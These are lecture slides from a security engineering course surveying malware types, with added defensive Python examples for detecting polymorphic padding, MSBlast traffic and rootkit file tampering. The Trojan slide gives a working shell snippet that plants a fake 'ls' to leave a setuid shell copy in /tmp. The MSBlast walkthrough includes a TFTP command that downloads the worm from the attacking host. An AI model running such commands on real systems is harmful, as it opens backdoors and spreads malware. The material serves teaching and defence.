Introduction to Malware

Dan Fleck
CS469 Security Engineering
Reference: Angelos Stavrou’s ISA564 and Computer Security by Bishop
What is Malicious Software?
Malicious Software (a.k.a. Malware)
• Software designed to infiltrate or damage a computer system, without the owner's informed consent
  -- http://en.wikipedia.org/wiki/Malware
• Examples: viruses, worms, Trojan horses, spyware, and other malicious and unwanted software
  • How about adware?
• Malware references the intent of the creator, rather than any particular features
  • DRM vs. rootkit (e.g., the Sony CD rootkit)
Why should we care?
(Three chart slides; source: Symantec Internet Threat Report 2012)

Taxonomy of Malicious Software
Trapdoor/Backdoor
• Secret entry point into a system
• Specific user identifier or password that circumvents normal security procedures
• Commonly used by developers
• Could be included in a compiler
  • Let's see Thompson's compiler
Thompson's Compiler
(slide dated November 1, 2004)
• Modify the compiler so that when it compiles login, login accepts the user's correct password or a fixed password (the same one for all users)
• Then modify the compiler again, so that when it compiles a new version of the compiler, the extra code to do the first step is automatically inserted
• Recompile the compiler
• Delete the source containing the modification and put the undoctored source back
The Login Program
Correct compiler:  login source --(correct compiler)--> login executable; user password --> logged in
Doctored compiler: login source --(doctored compiler)--> login executable; user password or magic password --> logged in
The Compiler
Correct compiler:  compiler source --(correct compiler)--> compiler executable; login source --> correct login executable
Doctored compiler: compiler source --(doctored compiler)--> compiler executable; login source --> rigged login executable
Thompson's Lesson
Verifying the source code isn't always enough!
Logic Bomb
• Embedded in legitimate programs
• Activated when specified conditions are met
  • E.g., presence/absence of some file; a particular date/time or a particular user
• When triggered, typically damages the system
  • Modify/delete files/disks
• Example: a disgruntled employee adds a trigger so that when the employee's salary record is deleted from the DB, all personnel records are deleted as well
Can you think of other logic bombs?
Trojan Horse
Program with an expected and a hidden effect
• Appears normal/expected
• Hidden effect violates security policy
User tricked into executing the Trojan horse
• Expects (and sees) the expected behavior
• Hidden effect performed with the user's authorization

Example (the attacker plants a fake ls in the victim's home directory):

Attacker:
    cat >/homes/victim/ls <<eof
    cp /bin/sh /tmp/.xxsh
    chmod u+s,o+x /tmp/.xxsh
    rm ./ls
    ls $*
    eof

Victim:
    ls
Trojan Horse Example: NetBus
• Designed for Windows NT systems
• Victim uploads and installs this
  • Usually disguised as a game program, or in one
• Acts as a server, accepting and executing commands for a remote administrator
  • This includes intercepting keystrokes and mouse motions and sending them to the attacker
  • Also allows the attacker to upload and download files
Virus
• Program that inserts itself into one or more files and performs some action
  • Insertion phase is inserting itself into a file
  • Execution phase is performing some (possibly null) action
• Self-replicating code
• Generally tries to remain undetected
• Pseudocode:
    if spread condition then
        for each target file
            if not infected then alter it to include the virus
    perform malicious action
    execute normal program   (step done only by Trojan horses to remain hidden)
Early Virus Reports
• Brain (Pakistani) virus (1986)
  • Written for IBM PCs
  • Alters boot sectors of floppies, spreads to other floppies
• MacMag Peace virus (1987)
  • Written for Macintosh
  • Prints "universal message of peace" on March 2, 1988 and deletes itself
Virus Types
Boot sector
• Problem: how to ensure the virus "carrier" is executed?
• Solution: place it in the boot sector of the disk
  • Runs on any boot
  • Propagates by altering boot disk creation
• Less common now, with few boots off floppies
• The Brain virus used this
Executable
• Malicious code placed at the beginning of a legitimate program (.EXE or .COM)
• Runs when the application is run
Virus Types
Macro virus
• Infected "executable" isn't machine code
• Relies on something "executed" inside application data
  • Common example: macros
• Otherwise similar properties to other viruses
• Architecture-independent
• Application-dependent
Macro Virus Example
• Melissa
  • Infected Microsoft Word 97 and Word 98 documents
  • Windows and Macintosh systems
• Invoked when the program opens an infected file
  • Installs itself as an "open" macro and copies itself into the Normal template
  • This way, it infects any files that are opened in the future
• Invokes the mail program and sends itself to everyone in the user's address book
Virus Types
Armored
• Encrypted virus
• Prevents a "signature" from being used to detect the virus
• Layout: the virus code becomes a deciphering routine, the enciphered virus code, and the deciphering key
Stealth
• Conceals the infection
• Traps reads and disinfects
• Lets execute calls load the infected file
  • Request for file length: return the length of the uninfected file
  • Request to open the file: temporarily disinfect the file, and reinfect on closing
  • Request to load the file for execution: load the infected file
Terminate and Stay Resident (TSR)
• Stays active in memory after the application completes
• Allows infection of previously unknown files
• Traps calls that execute a program
Virus Types
Polymorphic
• A virus that changes its form each time it inserts itself into another program
• Idea is to prevent signature detection by changing the "signature" or the instructions used for the deciphering routine
  • At instruction level: substitute instructions
  • At algorithm level: different algorithms to achieve the same purpose
• Toolkits to make these exist (Mutation Engine, Trident Polymorphic Engine)
Polymorphic Example
• These are different instructions (with different bit patterns) but have the same effect:
  • add 0 to register
  • subtract 0 from register
  • xor 0 with register
  • no-op
• A polymorphic virus would pick randomly from among these instructions
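Added example (not from the slides): a detection-side normalizer that strips the four equivalent padding instructions listed above before signature matching, so the variants a polymorphic virus picks from collapse back to one form. The assembly listings, the signature and the padding pattern are constructed for illustration.

```python
"""Instruction-level normalization before signature matching (added example)."""
import re

# The slide's interchangeable padding: add/sub/xor of 0 to a register, or nop.
# Each has a different bit pattern, so a byte/text signature sees four variants;
# normalizing them away makes the variants identical again.
NOOP = re.compile(r"^(nop|(add|sub|xor) \w+, 0)$")

def normalize(listing):
    """Lower-case, squeeze whitespace, and drop effect-free instructions."""
    out = []
    for raw in listing.splitlines():
        ins = " ".join(raw.strip().lower().split())
        if ins and not NOOP.match(ins):
            out.append(ins)
    return tuple(out)

# Two constructed variants of the same toy decryption loop, padded differently.
VARIANT_A = """
mov ecx, 12
add eax, 0
loop_top:
xor byte [esi], 0x5a
nop
inc esi
sub ecx, 0
dec ecx
jnz loop_top
"""
VARIANT_B = """
mov   ecx, 12
xor   edx, 0
loop_top:
xor byte [esi], 0x5a
inc esi
NOP
dec ecx
jnz loop_top
"""
# Constructed signature for the loop body.
SIGNATURE = "xor byte [esi], 0x5a\ninc esi\ndec ecx\njnz loop_top"

def raw_match(listing, signature=SIGNATURE):
    """Naive exact-text signature: defeated by any inserted padding."""
    return signature in listing

def normalized_match(listing, signature=SIGNATURE):
    """Match the normalized signature as a contiguous run in the normalized listing."""
    sig, norm = normalize(signature), normalize(listing)
    return any(norm[i:i + len(sig)] == sig for i in range(len(norm) - len(sig) + 1))
```

This handles the slide's instruction-level substitution only; algorithm-level polymorphism (a different decryption algorithm each generation) needs emulation or behavioural detection rather than text normalization.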
Worm
• Runs independently
  • Does not require a host program
• Propagates a fully working version of itself to other machines
• Carries a payload performing hidden tasks
  • Backdoors, spam relays, DDoS agents, ...
• Phases: probing -> exploitation -> replication -> payload
So, how is a virus different from a worm?

Worm Propagation
MSBlast Worm (Aug 2003)
Infection sequence (infected host -> new victim):
1. Exploits target on port 135/TCP
2. Binds ALWAYS to port 4444/TCP via injected code
3. Connects to target on port 4444/TCP
4. Creates shell "cmd.exe" and binds it to port 4444/TCP
5. Creates "TFTP Server" on port 69
6. Sends "TFTP" command to shell: tftp -l 192.168.0.1 GET msblast.exe
7. Runs TFTP command: teleports msblast.exe file
8. Sends "START msblast.exe" command
9. Runs worm on target
10. Closes connection
11. Shell closes
Host-firewall rule shown on the slide:
    Rule valid: svchost.exe
    TCP protocol: Direction: Inbound
    Local end point ports: 135
    Application: ANY
    Remote End Point: ANY/ANY
    Action: DENY
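Added example (not part of the slides): a small Python detector that replays the infection sequence above against connection-log records and reports attacker/victim pairs that complete the 135/TCP, 4444/TCP and TFTP stages in order. The log format and addresses are constructed; the direction of each stage follows the slide's diagram.

```python
"""Flag host pairs that complete the MSBlast infection sequence (added example)."""
from collections import defaultdict

# Constructed flow records, "time src dst proto dport"; not real traffic.
SAMPLE_LOG = """\
10:00:01 192.168.0.1 192.168.0.7 tcp 135
10:00:02 192.168.0.1 192.168.0.7 tcp 4444
10:00:03 192.168.0.7 192.168.0.1 udp 69
10:01:00 192.168.0.9 192.168.0.7 tcp 135
10:01:30 10.0.0.5 10.0.0.6 tcp 4444
10:02:00 10.0.0.6 10.0.0.5 udp 69
"""

# Network-visible stages from the slide, in order: the exploit hits 135/TCP,
# the attacker connects to the injected shell on 4444/TCP, then the victim
# pulls msblast.exe back from the attacker over TFTP (69/UDP).
STAGES = (("tcp", 135, "a->v"), ("tcp", 4444, "a->v"), ("udp", 69, "v->a"))

def parse(line):
    _, src, dst, proto, dport = line.split()
    return src, dst, proto, int(dport)

def find_msblast_pairs(log_text):
    """Return sorted (attacker, victim) pairs whose flows complete every stage in order."""
    progress = defaultdict(int)   # (attacker, victim) -> index of next expected stage
    hits = set()
    for line in log_text.splitlines():
        if not line.strip():
            continue
        src, dst, proto, dport = parse(line)
        # A flow could advance the pair in either role; try both attributions.
        for attacker, victim in ((src, dst), (dst, src)):
            pair = (attacker, victim)
            if pair in hits:
                continue
            want_proto, want_port, direction = STAGES[progress[pair]]
            expected = (attacker, victim) if direction == "a->v" else (victim, attacker)
            if (src, dst) == expected and (proto, dport) == (want_proto, want_port):
                progress[pair] += 1
                if progress[pair] == len(STAGES):
                    hits.add(pair)
                break
    return sorted(hits)
```

Stage order matters: a lone 4444/TCP connection or a TFTP transfer without the preceding 135/TCP exploit, as with the second host pair in the sample, is not reported.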
Zombie
• Secretly takes over another networked computer by exploiting software flaws
• Builds the compromised computers into a zombie network or botnet
• Uses it to indirectly launch attacks
  • E.g., DDoS
Let's see how we create zombies...
Zombie: Steps
1. Attacker scans the Internet for unsecured systems that can be compromised
2. Attacker secretly installs a zombie agent program, turning the unsecured computers into zombies
3. Zombie agents "phone home" and connect to a master server
4. Attacker sends commands to the master server to launch a DDoS attack against a targeted system
5. Master server sends a signal to the zombies to launch the attack on the targeted system
6. Target system is overwhelmed by zombie requests, denying requests from normal users ("Request Denied")
Rootkit
• "A rootkit is a set of programs and code that allows a permanent or consistent, undetectable presence on a computer"
• Goals:
  • Hide malicious resources (e.g., processes, files, registry keys, open ports, etc.)
  • Provide hidden backdoor access
Linux RootKit III
ls          Trojaned! Hide files
du          Trojaned! Hide files
ifconfig    Trojaned! Hide sniffing
netstat     Trojaned! Hide connections
chfn        Trojaned! User->r00t
chsh        Trojaned! User->r00t
inetd       Trojaned! Remote access
login       Trojaned! Remote access
passwd      Trojaned! User->r00t
ps          Trojaned! Hide processes
top         Trojaned! Hide processes
rshd        Trojaned! Remote access
syslogd     Trojaned! Hide logs
linsniffer  Packet sniffer!
fix         File fixer!
z2          Zap2 utmp/wtmp/lastlog eraser!
wted        wtmp/utmp editor!
lled        lastlog editor!
bindshell   port/shell type daemon!
tcpd        Trojaned! Hide connections, avoid denies
Rootkit
• Simple rootkits:
  • Modify user programs (ls, ps)
  • Detectable by tools like Tripwire
• Sophisticated rootkits:
  • Modify the kernel itself
  • Hard to detect from userland
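Added example (not from the slides): a Tripwire-style integrity check that catches the simple-rootkit case above, where ls or ps is replaced. The directory layout and file contents are constructed in a temporary directory; baseline and verify are illustrative functions, not Tripwire's own code.

```python
"""Tripwire-style file-integrity check against user-land rootkits (added example)."""
import hashlib
import os
import tempfile

def hash_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()

def baseline(directory):
    """Digest every file under directory; taken once on a known-clean system."""
    snap = {}
    for root, _, files in os.walk(directory):
        for name in files:
            path = os.path.join(root, name)
            snap[os.path.relpath(path, directory)] = hash_file(path)
    return snap

def verify(directory, snap):
    """Compare the live tree with the stored baseline."""
    now = baseline(directory)
    return {
        "modified": sorted(k for k in snap if k in now and now[k] != snap[k]),
        "missing": sorted(k for k in snap if k not in now),
        "added": sorted(k for k in now if k not in snap),
    }

def demo():
    """Constructed scenario: a fake bin/ where ls is replaced and a z2 eraser appears."""
    with tempfile.TemporaryDirectory() as bindir:
        for name in ("ls", "ps", "netstat"):
            with open(os.path.join(bindir, name), "wb") as f:
                f.write(b"original " + name.encode() + b"\n")
        snap = baseline(bindir)            # would be stored off-host or read-only
        with open(os.path.join(bindir, "ls"), "wb") as f:
            f.write(b"trojaned ls\n")        # simulated LRK-style replacement
        with open(os.path.join(bindir, "z2"), "wb") as f:
            f.write(b"log eraser\n")
        return verify(bindir, snap)
```

The baseline and the checker itself must live outside the attacker's reach, and a kernel-level rootkit that intercepts file reads can hand the checker clean bytes, which is why the slide calls kernel rootkits hard to detect from userland.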
Rootkit Classification
• Replace apps
• Add code to all apps
  • See: http://www.phrack.org/issues.html?issue=62&id=12
• Replace/modify kernel modules
• Run the entire OS in a virtual machine
Lessons
• Malware comes in many types and styles
• It's not going away and will always hit new platforms as they come out
• We'll need multiple approaches to defend against it
Next up: Malware Defense!